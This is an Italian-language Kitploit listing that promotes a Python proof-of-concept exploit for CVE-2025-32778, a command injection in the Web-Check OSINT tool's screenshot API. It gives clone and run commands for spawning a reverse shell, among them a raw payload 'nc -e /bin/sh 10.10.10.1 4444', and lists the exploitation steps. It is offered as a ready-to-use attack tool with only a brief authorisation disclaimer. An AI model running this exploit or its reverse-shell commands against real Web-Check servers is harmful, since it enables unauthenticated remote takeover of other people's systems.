Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32778 — PoC exploit for CVE-2025-32778: command injection in Web-Check OSINT tool | Kitploit
Strumenti/GitHubGitHub/00xcanelo/cve-2025-32778
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

PoC exploit for CVE-2025-32778: command injection in Web-Check OSINT tool

Vedi Repository
311 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32778 - Exploit di Iniezione di Comandi in Web-Check

Critical Language: Python

Descrizione

CVE-2025-32778 è una vulnerabilità critica di iniezione di comandi nello strumento OSINT Web-Check di Lissy93.
Consente a un aggressore non autenticato di eseguire comandi di sistema arbitrari tramite il parametro url nell'API degli screenshot.

Questo script Python automatizza lo sfruttamento e può generare reverse shell o accettare payload shell personalizzati.


Avvertenza

  • Testa solo su sistemi di tua proprietà o per cui sei autorizzato.
  • L'uso non autorizzato è illegale e non etico.

Caratteristiche

  • Sfrutta l'iniezione di comandi url in Web-Check.
  • Supporta:
    • Reverse shell con --lhost e --lport.
    • Shell personalizzata tramite --shell.
  • Normalizzazione dell'URL.
  • Impedisce la combinazione di --shell con --lhost/--lport.

Requisiti

  • Python 3.x
  • Libreria Requests:
root@kitploit:~
pip install requests

Utilizzo

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778

Crea una reverse shell con lo strumento

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444

Payload shell personalizzato (grezzo)

root@kitploit:~
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"

Menu di aiuto

root@kitploit:~
python3 cve-2025-32778.py -h

Come Funziona

  1. Normalizza l'URL target in scheme://host[:port].

  2. Prepara il payload:

    • Genera una reverse shell usando --lhost e --lport.
    • Oppure usa un comando shell grezzo con --shell.
  3. Codifica il payload della shell per un'iniezione URL sicura.

  4. Invia una richiesta HTTP GET a /api/screenshot/ con il payload.

  5. Attendi la connessione della reverse shell.


🧑‍💻 Autore

00xCanelo
Profilo GitHub


Riferimenti

  • Repository GitHub di Web-Check – Progetto originale contenente il codice vulnerabile.
  • CVE-2025-32778 – Voce CVE che descrive la vulnerabilità di iniezione di comandi.
Scarica lo strumento